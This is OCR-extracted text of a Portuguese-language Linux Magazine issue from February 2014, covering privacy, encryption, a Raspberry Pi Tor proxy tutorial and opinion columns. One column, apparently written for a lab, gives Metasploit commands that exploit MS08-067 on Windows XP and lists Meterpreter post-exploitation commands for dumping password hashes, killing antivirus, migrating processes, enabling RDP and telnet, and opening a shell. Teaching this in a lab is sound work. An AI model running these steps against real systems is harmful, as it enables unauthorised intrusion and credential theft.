ANÁLISESimplifique sua vida ao executar comandos contra grupos de servidores e facilite a distribuição de arquivos ou softwares com Openvenus p.67

PRIVACIDADE

WWW.LINUXMAGAZINE.COM.BR

PR

IVA

CID

AD

E U

BU

NTU

PR

IVA

CY

RE

MIX

OP

EN

ATTIC

ALIC

E S

EG

UR

AN

ÇA

NS

A O

PE

NV

EN

US

APA

CH

E R

AS

PB

ER

RY

PI

#108 02/14

R$ 14,90 € 7,50

9 771806 942009

0 0 1 0 8

SEGURANÇA NÃO É MAIS LUXO. PASSOU A SER UMA NECESSIDADE PREMENTE EM TEMPOS ONDE SOMOS VIGIADOS O TEMPO TODO P.30

» Aprenda a criptografar dados em nível de software e hardware P.31

» Conheça os principais recursos de privacidade dos navegadores web P.38

» Ubuntu Privacy Remix: converta seu computador em uma ilha de segurança P.44

» Medidas de segurança imprescindíveis em tempos de NSA P.48

VEJA TAMBÉM NESTA EDIÇÃO:» Transforme seu RaspberryPi em um servidor proxy p.56» Diretivas de segurança para Apache SSL p.59» Gestão e armazenamento unificado com openATTIC p.66» Programação visual com o IDE Alice p.70

A REVISTA DO PROFISSIONAL DE TI

# 106 Setembro 2013

MADDOG P.25Trilhar o próprio caminho leva a melhores resultados

CEZAR TAURION P.27Deixamos muitas pegadas digitais pelo mundo virtual

AUGUSTO CAMPOS P.10 OpenBSD, milionários romenos ea continuidade

02/2014

3Linux Magazine #108 | Fevereiro de 2014

Expediente editorialDiretor Geral Rafael Peregrino da Silva rperegrino@linuxmagazine.com.br

Editores Flávia Jobstraibizer fjobs@linuxmagazine.com.br

Laura Loenert Lopes llopes@linuxmagazine.com.br

Editor de Arte Hunter Lucas Fonseca hfonseca@linuxnewmedia.com.br

ColaboradoresTim Schürmann, Konstantin Agouros, Kristian Kissling, James Stanger, Jeff Layton, Kurt Seifried, Zack Brown, Jon “maddog” Hall, Alexandre Borges, Cezar Taurion, Charly Kühnast, Martin Loschwitz, Harry Knitter, Falko Benthin, Valentin Höbel, Thomas Leichtenstern,Gilberto Magalhães, Klaus Knopper, Augusto Campos.

Tradução Laura Loenert Lopes

Revisão Flávia Jobstraibizer

Editores internacionais Uli Bantle, Andreas Bohle, Jens-Christoph Brendel, Hans-Georg Eßer, Markus Feilner, Oliver Frommel, Marcel Hilzinger, Mathias Huber, Anika Kehrer, Kristian Kißling, Jan Kleinert, Daniel Kottmair, Thomas Leichtenstern, Jörg Luther, Nils Magnus.

Anúncios: Rafael Peregrino da Silva (Brasil) anuncios@linuxmagazine.com.br Tel.: +55 (0)11 3675-2600

Penny Wilby (Reino Unido e Irlanda) pwilby@linux-magazine.com

Amy Phalen (América do Norte) aphalen@linuxpromagazine.com

Hubert Wiest (Outros países) hwiest@linuxnewmedia.de

Diretor de operações Claudio Bazzoli cbazzoli@linuxmagazine.com.br

Na Internet: www.linuxmagazine.com.br – Brasil www.linux-magazin.de – Alemanha www.linux-magazine.com – Portal Mundial www.linuxmagazine.com.au – Austrália www.linux-magazine.es – Espanha www.linux-magazine.pl – Polônia www.linux-magazine.co.uk – Reino Unido www.linuxpromagazine.com – América do Norte

Apesar de todos os cuidados possíveis terem sido tomados durante a produção desta revista, a editora não é responsá-vel por eventuais imprecisões nela contidas ou por consequ-ências que advenham de seu uso. A utilização de qualquer material da revista ocorre por conta e risco do leitor.

Nenhum material pode ser reproduzido em qualquer meio, em parte ou no todo, sem permissão expressa da editora. Assume-se que qualquer correspondência recebida, tal como cartas, emails, faxes, fotografias, artigos e desenhos, sejam fornecidos para publicação ou licenciamento a terceiros de forma mundial não-exclusiva pela Linux New Media do Brasil, a menos que explicitamente indicado.

Linux é uma marca registrada de Linus Torvalds.

Linux Magazine é publicada mensalmente por:

iMasters FFPA Informática LTDA Rua Claudio Soares, 72 – Conj. 1302 05422-030 – São Paulo – SP – Brasil Tel.: +55 (0)11 3063-5941

Direitos Autorais e Marcas Registradas © 2004 - 2014:Linux New Media do Brasil Editora Ltda. Impressão e Acabamento: EGB

Atendimento Assinante

www.linuxnewmedia.com.br/atendimentoSão Paulo: +55 (0)11 3063-5941

ISSN 1806-9428 Impresso no Brasil

“Se você me disser quem são os seus heróis, eu vou lhe dizer quem você se tor-nará”. A frase citada é de autoria de Warren Buffet ( – 30/08/1930 – ), investidor e filantropo estadunidense, presidente da Berkshire Hathaway, constantemente citado na lista das pessoas mais ricas do mundo (ocupou o primeiro lugar em 2008). A estratégia de avaliação de Buffet é tão simples quanto eficiente: ele está procurando pelas referências de que dispomos, para avaliar nossas aspi-rações. São essas referências – e o quanto estamos aferrados a elas – que nor-teiam nossas conquistas, alimentam nossos sonhos, nos impelem ao trabalho árduo incansável, à busca pela superação (nossa própria e a da concorrência).Como acontece com pessoas, empresas também precisam de referências, que se traduzem em um planejamento estratégico, composto pelas ações que a empre-sa vai tomar para levar seu produto, serviço ou solução para o mercado. E nada pode ser pior para uma empresa do que perder sua referência e sofrer uma crise de identidade. Isso pode ocorrer, por exemplo, quando o mercado muda (e os poderes dos heróis que formavam a base da identidade da empresa e garantiam o seu sucesso em meio às adversidades não são mais eficazes), ou quando uma grande referência dentro da própria empresa tem que ser substituída, e não é pos-sível encontrar um timoneiro da mesma estatura para assumir o leme da compa-nhia. Sem capacidade de inovar, a empresa passa a degenerar e a crise se instala.Não é necessário ir muito longe para imaginar várias empresas no segmento de tecnologia que tenham passado por perdas de referência. Na década de 90, a Apple viveu isso quando Steve Jobs deixou a companhia. A bola da vez é a Microsoft. Desde 21/07/1998, com a aposentadoria de Bill Gates, Steve Ballmer conseguiu a proeza de reduzir o valor da ação ordinária da empresa em mais de 66%, valor que está, atualmente, 79% abaixo do seu valor de pico – atingido em 25/03/1999, época em que nos referíamos à empresa como “a gigante do software”.Atropelada por empresas como Google, que soube usar Software Livre como nin-guém para criar uma gama de serviços (em sua maioria gratuitos) como base para um modelo de negócios inovador e auferir lucros através de publicidade assertiva, e pela Apple, companhia que ajudou a salvar no final do século passado, e que foi capaz de revolucionar o modo como a humanidade passou a interagir com tec-nologia, a empresa de Bill Gates vê erodir continuamente as bases do seu império. Cogita-se, inclusive, que a próxima versão do Windows (a 9, codinome Treshold), será distribuída gratuitamente a quem se interessar. Incapaz de manter o ritmo e acompanhar as mudanças do mercado de tecnologia (Software Livre, virtuali-zação, Cloud, redes sociais, mobilidade etc.), que paulatinamente abandona o PC em favor de dispositivos portáteis, a empresa, que segura seu faturamento por meio do binômio Windows® e Office®, ainda deve passar por poucas e boas antes de encontrar novamente um caminho que a conduza de volta à trilha do sucesso. Sem referências para se apoiar, inserida em um mundo que mudou, até o fecha-mento desta edição, a Microsoft ainda não havia encontrado um substituto para seu CEO, que anunciou em 2013 deixaria seu posto até o mês de agosto de 2014. A líder se tornou coadjuvante. Manterá pelo menos essa posição? Ouso duvidar.Enquanto isso, temos Linux everywhere...

Rafael Peregrino da Silva Diretor de Redação

ReferentiaEditorial

38 www.linuxmagazine.com.br

www.supermicro.com/IPC© Super Micro Computer, Inc. - As configurações estão sujeitas a mudança sem aviso prévio.

Intel, o logotipo Intel, Xeon e Xeon Inside são marcas da Intel Corporation nos EUA e em outros países.Todas as outras marcas e nomes são propriedade de seus respectivos donos.

PLATINUM

Building Blocks Solutions

Chassis CompactoX9SPV, X9SCQ, X9SCAA, X9SBAA

PC Industrial compactoSC842XTQ-R606B

Otimizado para aplicações de alto desempenhoC7B75, X9DRD-EF, X9DR7-TF+,

X9DRE-TF+, X9SRH-7F/7TF Chassis compacto com profundidade reduzida

SC512F-203BSC505-203B

CompactoMini-ITX Box PC

SC101i

• Placas-mãe de tamanho padrão com alto desempenho• Platformas industriais compactas e otimizadas para uso em rack• Fontes de alta eficiência 80Plus Platinum e Gold• Soluções SuperServers® otimizadas e prontas para produção Gerencia-

mento remoto por IPMI ou AMT Intel®• Assistência técnica de abrangência mundial com suporte estendido a produtos

de ciclo de vida de longa duração• Suporta Processador Intel® Xeon® E5-2600

Ciclo de vida de longa duração. Alta eficiência. Chassis Compacto. Alto desempenho. Lançamento mundial

SDC Engenhariatel. 11-5633-2855

e-mail: servers@sdc.com.brwebsite: www.sdc.com.br

CeBIT 2014, March 10-14th, Hannover GermanyHall 2, Stand B49(B56)

SM_ERP_20130416_Print_LinuxBrazil.indd 4 12/23/2013 6:25:44 PM

4 www.linuxmagazine.com.br

Escondido na web 38

Os principais navegadores pretendem proteger os usuários contra coleta de dados e contra a indústria da publicidade; no entanto, as promessas são muitas vezes bem diferentes da realidade.

CAPAEspiões a solta 30

A segurança não é mais um luxo. Passou a ser uma necessidade premente em tempos onde somos vigiados o tempo todo

Segurança consciente 44

Preocupado com espiões e criminosos? O Ubuntu Privacy Remix quebra todas as pontes da Internet e converte o computador em uma ilha de segurança. Se quiser voltar para a civilização, precisará de um pendrive USB e muita paciência.

INDICEDados protegidos 31

As recentes revelações sobre espionagem pela NSA têm renovado o interesse do mundo sobre a criptografia de dados. A criptografia em nível de arquivo é rápida e fácil, mas se o usuário estiver à procura de uma dose extra de proteção, tente criptografar todo o dispositivo de bloco.

Truques poderosos 48

Talvez não seja possível parar a NSA, mas o usuário ainda pode tomar medidas significativas para proteger sua privacidade.

5Linux Magazine #107 | Outubro de 2013

| ÍNDICELinux Magazine 108

Escondido na web 38

Os principais navegadores pretendem proteger os usuários contra coleta de dados e contra a indústria da publicidade; no entanto, as promessas são muitas vezes bem diferentes da realidade.

Coluna: Jon “maddog” Hall 24

Coluna: Cezar Taurion 26

Notícias 28

➧ Cofundador da Apple elogia Xiaomi

➧ Oracle instalará data center no Brasil em 2014

CORPORATECOLUNASCharly Kühnast 08

Augusto Campos 09

Alexandre Borges 10

Kurt Seifried 12

Klaus Knopper 15

Zack Brown 18

Notícias 24

➧ Governo autoriza concurso para contratar especialistas em TI

Portas fechadas 59

Para estragar o dia de ladrões de dados, os administradores Apache só precisam de três diretivas adicionais – e alguns comandos úteis.

TUTORIAL

A face de Vênus 75

A plataforma Openvenus visa simplificar a vida do administrador; ela executa comandos contra grupos de servidores e distribui arquivos ou softwares diretamente de uma localização central.

ANALISE´

SERVIÇOSEditorial 03

Emails 06

Linux.local 78

Preview 82

Procurando Nemo 70

Assim como podemos usar nosso ambiente de desktop, também podemos escrever programas para ele: tudo o que precisamos é um mouse, o Alice IDE, e algum tempo de aprendizado

PROGRAMAÇÃO

Armazenamento limpo 66

O openATTIC promete o gestão de armazenamento unificado para meios heterogêneos. A interface web facilita o serviço e suporta drives de rede acessados via SMB e NFS.

REDES

Porta para o mundo 56

Estenda a proteção a todo o tráfego de Internet com o minicomputador Raspberry Pi configurado como um servidor proxy externo efetivo.

A partir de Fevereiro de 2014, sua revista predileta está de casa nova. A mesma qualidade que você

já conhece, com muito mais benefícios.

A revista Linux Magazine agoraé mantida pela iMasters

Eu faço a internet no Brasil

9Linux Magazine #108 | Fevereiro de 2014

Na sua forma mais simples, a continuidade se traduz na questão da disponibilidade do código. Ao contrário do que usualmente

ocorre com sistemas proprietários, um software aberto não desaparece no caso de seus mante-nedores abandonarem o seu desenvolvimento. O código permanece disponível para que qualquer interessado apto passe a desenvolvê-lo.

Mas existe uma forma de continuidade mais valiosa, que é a continuidade do desenvolvimento, especial-mente importante no caso de softwares que ofere-cem serviços de segurança ou privacidade. É a satis-fação da expectativa dos usuários de que o sistema continue sendo desenvolvido pelas mesmas pessoas que contam com a confiança da comunidade, e que elas permaneçam incluindo atualizações e corrigindo falhas de modo a manter o software útil e seguro.

No caso de sistemas mantidos por comunidades, essa segunda forma de continuidade exige uma condição essencial: os mantenedores do sistema precisam definir um bom plano viável para obter (também continuamente) os recursos necessários para a estabilidade do desenvolvimento e disponi-bilidade do projeto, controlando suas despesas e custos, e obtendo receita correspondente a eles.

Existem várias formas de fazer isso: o kernel Linux é mantido por uma fundação que cobra anuidades de

uma série de grandes empresas par-ticipantes, os produtos da Mozilla são mantidos por uma corporação que comercializa a presença de serviços de busca (principalmente

os do Google) em seus aplicativos, a Wikipédia ostensivamente pede

doações a seus próprios usuários, e diversos projetos relevantes contam com desenvolvedores cujos salários são pagos por empresas interessadas em seus produtos, por exemplo.

Mesmo quando o projeto não tem empregados e todos os seus participantes são voluntários alta-mente motivados, podem existir despesas e custos, como os de hospedagem de sites, de distribuição, de publicidade, de obtenção de certificados de segurança/compatibilidade, etc. – e é necessário encontrar uma fonte estável para essa receita.

O projeto OpenBSD que, entre vários outros produtos, é o responsável pelo OpenSSH usado em quase todas as distribuições Linux como recurso básico de terminal remoto e como parte de uma das ferramentas mais acessíveis para comunica-ções com privacidade, recentemente passou por um susto quanto à sua continuidade.

Para manter as suas próprias premissas de se-gurança, o OpenBSD disponibiliza seus sistemas apenas em servidores mantidos em infraestrutura gerenciada pelos próprios integrantes do projeto, não podendo assim recorrer aos baratos serviços de hospedagem online tão comuns.

Isso funcionou bem ao longo de anos, mas no co-meço de 2014 veio o alerta: as receitas previstas para este ano não seriam suficientes para pagar os custos de eletricidade dos ambientes desses servidores. Ou a comunidade dava um jeito de obter US$ 20.000 ou o projeto estava em risco de fechar as portas.

O susto inicial durou cerca de 2 semanas, até que surgiu a notícia de que um milionário romeno doou os US$ 20.000. Mas o meu susto, na condição de u-suário que valoriza os produtos do OpenBSD, é de mais longa duração: essa comunidade tem despesas e custos permanentes, produz softwares de grande valor, e poderia equacionar isso de maneira mais per-manente sem ter de recorrer a campanhas urgen-tes de coleta diretamente junto aos usuários finais.

Vale para o OpenBSD, mas vale também para a governança do projeto que você pensa em iniciar: se vai ter uma despesa, pense na origem dos re-cursos, sem deixar saldos se acumularem colocan-do em risco esse grande valor: a continuidade. n

Coluna do AugustoOpenBSD, milionários romenos e a continuidadeUm dos maiores valores e diferenciais que um projeto de código aberto pode oferecer é a continuidade.por Augusto Campos

10 www.linuxmagazine.com.br

O Metasploit disponibiliza um payload especial chamado de Meterpreter, que proporciona ampla interação com a máquina alvo após

a invasão, assim como uma inteligente coleta de dados e possibilidade de execução de uma ampla variedade de scripts. Não são em todos os casos de invasão que existe a possibilidade de utiliza-ção o Meterpreter como payload de controle, no entanto, em grande parte das ocorrências isto é possível e, inclusive, recomendado. Nesta coluna, ao invés de mostrar a execução dos comandos, vamos aprender a trabalhar com alguns deles, suas opções e scripts, e, se necessário, visualizar a saída resultante. Isto é um convite para que o leitor possa fazer seus próprios experimentos e observar com detalhes o resultado de comandos ou scripts, os quais não seriam factíveis incluir nesta coluna devido ao seu espaço reduzido.

O ambiente que foi utilizado têm máquinas vir-tuais WMware ou VirtualBox, sendo que uma de-las possui o Kali Linux versão 1.6 – 64 bits e a outra executa o Windows XP SP2 – 32 bits. Ambas estão usando uma conexão com o mundo externo do tipo NAT onde o Kali tem endereço IP 192.168.81.128 e o Windows tem endereço IP 192.168.81.132. A primei-ra etapa, mais simples, é realizar a exploração em busca de uma falha do WinXP e para isso você já aprendeu nas colunas anteriores que pode fazer

uso do OpenVAS ou do Nesssus para lis-tar as vulnerabilidades. Deste ponto,

podemos usar o Metasploit (figura 1). O comando show payloads listará os payloads que podem ser utilizados e enviados para a máquina explo-rada, entretanto somente alguns

envolvem o Meterpreter. Por isto, vamos incluí-lo:

msf exploit(ms08_067_netapi) > set payload windows/

meterpreter/bind_tcp

Deste ponto em diante estamos prontos para

explorar a vulnerabilidade citada e isto é feito de acordo com a figura 2.

Como o leitor pode notar, o sistema foi invadido com sucesso. Deste ponto, utilizando o meterpre-ter como payload, o mesmo criou uma sessão para a máquina alvo, nos proporcionando um enorme leque de alternativas onde uma lista com algumas opções possíveis seguem abaixo: ps » observa todos os processos sendo executados na máquina invadida;getid » evidencia com qual usuário estamos loga-dos após a invasão;sysinfo » mostra informações do sistema invadidoscreenshot » tira uma foto do deskop da máquina inva-dia e a armazena no diretório /root;getpid » obtém o PID do processo que está sendo exe-cutado depois de ter invadido a máquina;migrate <pid> » migra a sessão usada pelo Meter-preter para outro processo que seja persistente (figura 3). O motivo disto é evitar que o usuário da máquina invadida termine o processo no qual estamos conectados e, com isto, seja perdido o acesso ao host por parte do hacker; hashdump » realiza um “dump” do SAM (Security Ac-count Manager). Todavia, para que isto possa ser feito com sucesso, devemos nos conectar como SYSTEM. Caso este não seja o caso, tente elevar o

Coluna do Alexandre

Metasploit – parte 8Comandos úteis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados. por Alexandre Borges

Figura 1 Console do Metasploit.

Figura 2 Exploração bem sucedida de vulnerabilidade.

root@kali:~# msfconsolemsf > search ms08-067msf > use exploit/windows/ smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show optionsmsf exploit(ms08_067_netapi) > set RHOST 192.168.81.132msf exploit(ms08_067_netapi) > show payloads

11Linux Magazine #108 | Fevereiro de 2014

Comandos úteis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados. por Alexandre Borges

privilégio com o comando use priv antes do co-mando hashdump. Após obter os hashes, uma opção seria usar um cracker como “John the Ripper” ou “L0phtCrack” para descobrir as senhas. Escrevi um tutorial simples sobre o assunto que pode ser acessado em [1];background » deixa a sessão do Meterpreter em segun-do plano e volta para o prompt normal do msfconsole; sessions -l » lista as sessões ativas do Meterpreter;session -i » assume uma sessão do Meterpreter de forma interativa; run checkvm » verifca se a máquina explorada é exe-cutado em uma máquina virtual ou não; run getcountermeasure » realiza a verificação de quais medidas de segurança estão implementadas na máquina alvo; run killav » desabilita programas antivirus que es-tão em execução na máquina de destino; run scraper » coleta diversas informações sobre o sistema alvo, incluindo o registro no caso de má-quinas Windows, e salva em um diretório local (como /root/.msf4/logs/scripts/scraper);

run getgui -e » habilita o Remote Desktop Protocol (RDP) na máquina alvo caso ele esteja desabilitado (figura 4).run winenum » executa enumeração completa da máquina alvo; run gettelnet -e » habilita o serviço de telnet no destino.run shell » abre um shell para a máquina hackea-da (figura 5). n

Figura 4 RDP na máquina alvo.

Figura 5 Abertura de shell na máquina hackaeada.

Figura 3 Transferência da sessão ativa do Meterpreter.

Mais informações[1] Como descobrir senhas: http://alexandreborges.org/2013/08/05/introduction-to-password-cracking-part-1/

Rua Viúva Cláudio, 291 – Rio de Janeiro - RJ Tels: (21) 3278-8069 | (21) 3278-8159

/altabooks alta_books

Conheça também:

Código:

lnx2014

Todos os livros

do nosso site com

30% de desconto

com o código

promocional*

* Promoção válida por tempo limitado, somente para compras realizadas no site www.altabooks.com.br

www.altabooks.com.br

ALTA BOOKSE D I T O R A

Distribuidora exclusiva da Série linux Pro

linux magazine janeiro 2014.indd 1 06/02/2014 14:52:10

26 www.linuxmagazine.com.br

Vivemos tão empolgados com as inovações tec-nológicas que muitas vezes esquecemos que além das inúmeras oportunidades de utilizá-las

para criar rupturas nos negócios, também incorremos em riscos. Big Data nos abre imensas possibilidades de fazer análises e correlações impensáveis há alguns anos. Criamos oportunidades de conhecermos inti-mamente nossos clientes, abrindo espaço para enga-jamentos contínuos com eles, afinal estão conecta-dos aos seus smartphones e tablets todo o tempo e sabemos onde cada um deles está a cada momento.

Mas tudo tem seu “dark side” e neste post gos-taria de instigar um debate sobre alguns aspectos que precisamos, pelo menos, melhor entender e avaliar. Privacidade é o tema. Até que ponto que-remos ou mesmo sabemos onde termina nossa privacidade e que desejamos em troca dela?

Recentemente vimos revelações da abrangên-cia da bisbilhotagem internacional praticada pela NSA (National Security Agency) dos EUA. O volume de dados a ser armazenado no seu mais novo data center, no estado de Utah, com cerca de 10.000 m² para data storage será equivalente a 12 exabytes, o que significa que poderão interceptar e guardar todas as comunicações telefônicas feitas por toda a população dos EUA em um período de 40 anos. Um mês de conversações gravadas demanda cer-ca de 270 petabytes e 12 exabytes corresponde a 12.000 petabytes. Mas, vamos além disso. No nosso

dia a dia usamos plataformas sociais, emails gratuitos e inúmeros aplica-tivos. Sabemos o que todos estes serviços fazem com estes nossos dados pessoais? De maneira geral

nós concedemos a estes serviços o direito de usar nossos dados ao clicar

em suas políticas de privacidade (nin-guém as lê) em troca dos recursos que

nos oferecem. Afinal queremos permane-cer conectados aos nossos amigos, quere-

mos enviar uma mensagem curta e ime-diata. E porque não usar email gratuito?

As plataformas sociais também buscam coletar volumes imensos de dados sobre

seus usuários. Um paper intrigante é o “On Second Thought… Facebook wants to know why you didn’t publish that status update you started writing”, que mostra a possibilidade do Facebook coletar dados sobre textos que você começou a digitar, mas não publicou. Ele é baseado em uma pesquisa de dois cientistas do Facebook que analisaram o fenôme-no da autocensura e tentam avaliar o porque deste comportamento. O paper não diz que o Facebook faz isso mas que existe a tecnologia e a possibilidade.

Os smartphones, por sua vez, são sensores sem-pre alertas. Existe a possibilidade do smartpho-ne ser rastreado mesmo se estiver desligado. Na verdade tecnologias desenvolvidas para ajudar o usuário do smartphone como o Find My Phone que ajudam a localizar o iPhone perdido também pode servir de base para usos inadequados. Afinal ela existe e é passível de ser copiada.

E indo em frente, mesmo que usemos dados ano-nimizados, pesquisadores conseguiram demonstrar que é praticamente possível identificar qualquer in-dividuo com dados de geolocalização de seu smar-tphone. Deixamos uma pegada digital a todo instante. Acessamos aplicativos (muitas delas usam geoloca-lização), compartilhamos posts no Facebook, tuita-mos, fazemos buscas no Google, enviamos emails, compramos pela web, usamos cartões de crédito, passamos e somos gravados dezenas de vezes por inúmeras câmeras de vídeo. O Rio de Janeiro, por exemplo, tem cerca de 700 mil câmeras em bancos, lojas, condomínios etc. Como se manter anônimo com tanta pegada digital deixada a cada dia?

Na prática nos acostumamos com a quebra de priva-cidade em troca de segurança (passamos pelos raios-x nos aeroportos sem reclamar e vemos as placas de “Sorria, você está sendo filmado” nas lojas e nem por isso deixamos de entrar nelas), usamos aplicativos, plataformas sociais e outros serviços na web. Talvez o próprio critério de privacidade deva ser repensado. n

Privacidade na era digitalColuna do Taurion

Como se manter anônimo com tanta pegada digital deixada a cada dia? por Cezar Taurion

Cezar Taurion (ctaurion@br.ibm.com) é diretor de novas tecnologias aplicadas da IBM Brasil e editor do primeiro blog da América Latina do Portal de Tecnologia da IBM developerWorks, em https://www.ibm.com/developerworks/mydeveloperworks/blogs/ctaurion/.

27Linux Magazine #XX | Mês de 200X

Privacidade na era digital

30 www.linuxmagazine.com.br

Espiões à soltaSegurança não é mais luxo. Passou a ser uma necessidade premente em tempos onde somos vigiados o tempo todo.por Flávia Jobstraibizer

Desde que deixou de ser luxo e tornou-se um item básico de sobrevivência

nas cestas básicas da população, a privacidade, bem como tudo o que está envolvida nela, como suas conversas pessoais, suas compras online, suas transações bancá-rias, seus e-emails e até mesmo o trajeto que você faz em alguma rua, atualmente monitorada por câmeras de segurança, que arma-zenam as imagens em bancos de dados, visualizados por pessoas chave dos departamentos de se-gurança das cidades e por aí vai, é alvo constante das manchetes que divulgam as mais recentes novidades sobre o fato de que estamos sendo constantemente monitorados (embora já existisse

há anos um conhecimento velado sobre o assunto).

Devemos jogar do lado dos mocinhos e aproveitar também a tecnologia para trabalhar em nosso benefício, no que tange à proteção da nossa identidade e dados pessoais. Atualmente temos um arsenal muito variado de fer-ramentas, programas, protocolos e serviços que podem nos auxiliar na tarefa de manter abelhudos longe de nossas atividades.

Nesta edição da Linux Maga-zine, você irá aprender técnicas e conhecer soluções para proteger sua identidade, seus dados e suas atividades de potenciais espiões ou contra qualquer tipo de invasão de privacidade. Conheça os melhores recursos de proteção à privacidade

embutidos nos principais navega-dores de Internet do mercado e aprenda a configurá-los correta-mente para uso seguro ou anônimo. Aprenda ainda como criptografar dados em nível de hardware ou software de forma que nem você mesmo consiga leitura dos dados sem uma frase de segurança espe-cífica. Saiba também a recuperar dados apagados e outros truques que poderão salvar o dia em um momento de necessidade.

Boa leitura! n

Capa

Matérias de capa Dados protegidos 31Escondido na web 38Segurança consciente 44Truques poderosos 48

56 www.linuxmagazine.com.br

Porta para o mundoEstenda a proteção a todo o tráfego de Internet com o minicomputador Raspberry Pi configurado como um servidor proxy externo efetivo.por Valentin Höbel e Thomas Leichtenstern

O Projeto Tor oferece uma opção para ofuscar o en-dereço IP e desta forma

esconder a pista mais importan-te para que alguém chegue até sua identidade na web. Quando instalado localmente, precisamos conectar cada aplicativo cliente única e separadamente com o Tor, o que pode ser complicado. Além disso, o aplicativo deve

ser capaz de se comunicar via SOCKS. Se, em vez disso, esco-lhermos encaminhar o tráfego da Internet inteira através da rede Tor, a única opção é utilizar um roteador externo.

O Raspberry Pi (figura 1) é ideal para essa função porque o hard-ware é barato e seu consumo de energia é baixo. O projeto ganhou popularidade como Onion Pi [1]. Mas, mesmo como um usuário Tor, não devemos confiar na so-lução por si só para garantir a segurança. Afinal, ofuscar o en-dereço IP é apenas metade da batalha e não consegue escon-der a identidade do usuário por conta própria (quadro 1).

DesligadoEste guia de configuração do Onion Pi assume que tenhamos uma imagem como o Raspbian [4], criada no cartão SD conectado ao

Raspberry Pi. Toda a entrada e alterações listadas no artigo re-querem privilégios de root. Além disso, precisamos de um cabo de rede e de uma conexão sem fio.

O primeiro passo é configurar o Raspberry Pi como um ponto de acesso e o servidor de DHCP. Use o comando ifconfig ‑a para verificar se a interface wlan0 está disponível. Se a interface já possui um ende-reço IP, podemos desativá-la com:

ifdown wlan0

O próximo passo é instalar os componentes de software neces-sários com o seguinte comando:

apt‑get update && apt‑get install

Tutorial

Figura 1 Corretamente configurado, o Raspberry Pi, que é pouco maior que um baralho de cartas, pode manter anônimo o tráfego de toda Internet.

Quadro 1: Limites do Tor

Qualquer pessoa que use o Tor não deve considerá-lo uma opção inerentemente segura para navegar na web anonimamente; também deve-se considerar uma série de falhas. Por exemplo, scripts ativos, tais como Flash e JavaScript, assim como Java, são capazes de revelar a identidade do usuário. Além disso, extensões de navegadores como o “1Button App”, da Amazon, acompanham cada pedido e até mesmo enviam a entrada de chave de pesquisa para os servidores da Amazon [2]. A situação é semelhante com os cookies, que fornecem informações sobre as páginas visitadas pelo usuário. Se efetuarmos o login em serviços, como o Google, Facebook, Twitter etc., ele apaga naturalmente qualquer tipo de anonimato que o Tor possa oferecer ao usuário. Assim, devemos também fazer o hardening (endurecimento ou melhoria da segurança) do navegador com plugins e configurações corretas – apenas para nos mantermos do lado seguro.Outro aspecto geralmente negligenciado são nós de saída ruins. Nós de saída geralmente funcionam como o árbitro final na mistura, e transferem dados de forma clara, a menos que a página solicitada use criptografia SSL. Para operadores de nós de saída – que, basicamente, qualquer um pode operar – é muito fácil capturar informações de login ou documentos potencialmente sensíveis do fluxo de dados. Por outro lado, podemos nos proteger usando apenas nós de saída confiáveis, tais como os utilizados pelo Chaos Computer Club [3].

57Linux Magazine #108 | Fevereiro de 2014

hostapd isc‑dhcp‑server tor

Em seguida, edite o arquivo de configuração do servidor DHCP /etc/dhcp/dhcpd.conf em seu editor preferido e comente as seguintes linhas, adicionando uma hashtag (#) no início de cada linha:# option domain‑name "example.org"; # option domain‑name‑servers ns1.example.org, ns2.example.org;

Em seguida, remova o caractere de comentário à esquerda de autho‑ritative; declare e anexe o bloco de configuração mostrado na listagem 1 para o arquivo, salve e feche.

No arquivo /etc/default/isc‑dhcp‑server, informe ao servi-dor qual interface usar para atribuir endereços IP no futuro usando a diretiva INTERFACES=. Para o cenário atual, precisamos digitar um valor de wlan0 e atribuir um endereço IP estático à interface wlan0 no arquivo /etc/network/interfaces (listagem 2).

Executar o comando ifup wlan0 habilita a interface sem fio. Para o Onion Pi atuar como um ponto de acesso, primeiro precisamos configurar o serviço no arquivo /etc/hostapd/hostapd.conf (listagem 3). É recomendável alterar o valor

de wpa_passphrase: esta senha será usada posteriormente para fazer o login na rede local sem fio.

Para que o serviço Upstart inicie automaticamente com o sistema, digite o valor:

DAEMON_CONF="/etc/hostapd/hostapd. conf"

no arquivo de configuração /etc/default/hostapd. Para compatibi-lidade com as conexões WLAN atuais, os desenvolvedores do Onion Pi também recomendam uma atualização do hostapd:

wget http://www.adafruit.com/ downloads/adafruit_hostapd.zip unzip adafruit_hostapd.zip mv /usr/sbin/hostapd /usr/sbin/ hostapd.ORIG mv hostapd /usr/sbin chmod 755 /usr/sbin/hostapd

Após atualizar o serviço do ponto de acesso, inicie os dois componentes com:

service hostapd start service isc‑dhcp‑server start

Para carregar os componentes automaticamente, digite:

update‑rc.d hostapd enable update‑rc.d isc‑dhcp‑server enable

na inicialização do sistema.

RedirecionamentoA comunicação entre a subrede sem fio e o Tor requer alguns ajus-tes na configuração da rede. O pri-meiro passo é abrir o arquivo /etc/sysctl.conf e acrescentar net.ipv4.ip_forward=1. O comando sysctl ‑p permite a alteração. Em seguida, devemos ajustar as regras do fi-

rewall iptables [5]. Para começar, ex-clua qualquer regra existente com:

iptables ‑F iptables ‑t nat ‑F

Em seguida, ative as regras mais importantes (listagem 4). Para salvar a configuração, digite:

sh ‑c iptables‑save > /etc/ iptables.ipv4.nat

Para permitir que o sistema faça o parse das novas regras no pró-ximo reboot, abra o arquivo /etc/network/interfaces e adicione uma linha em branco, seguida por ipta‑bles‑restore < /etc/iptables.ipv4.nat.

Configuração do TorAs configurações do Tor são ar-mazenadas no arquivo /etc/tor/torrc. Podemos adicionar o códi-go da listagem 5 logo após a linha ##https://www.torproject.org/docs/faq#torrc. Para que o Tor seja ca-paz de registrar suas mensagens

Listagem 2: Endereço WLAN IPiface lo inet loopback iface eth0 inet dhcp allow‑hotplug wlan0 iface wlan0 inet static address 192.168.42.1 netmask 255.255.255.0

Listagem 3: Configuração de serviço Onion Piinterface=wlan0 driver=rtl871xdrv ssid=OnionPi hw_mode=g channel=6 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=<password> wpa_key_mgmt=WPA‑PSK wpa_pairwise=TKIP rsn_pairwise=CCMP

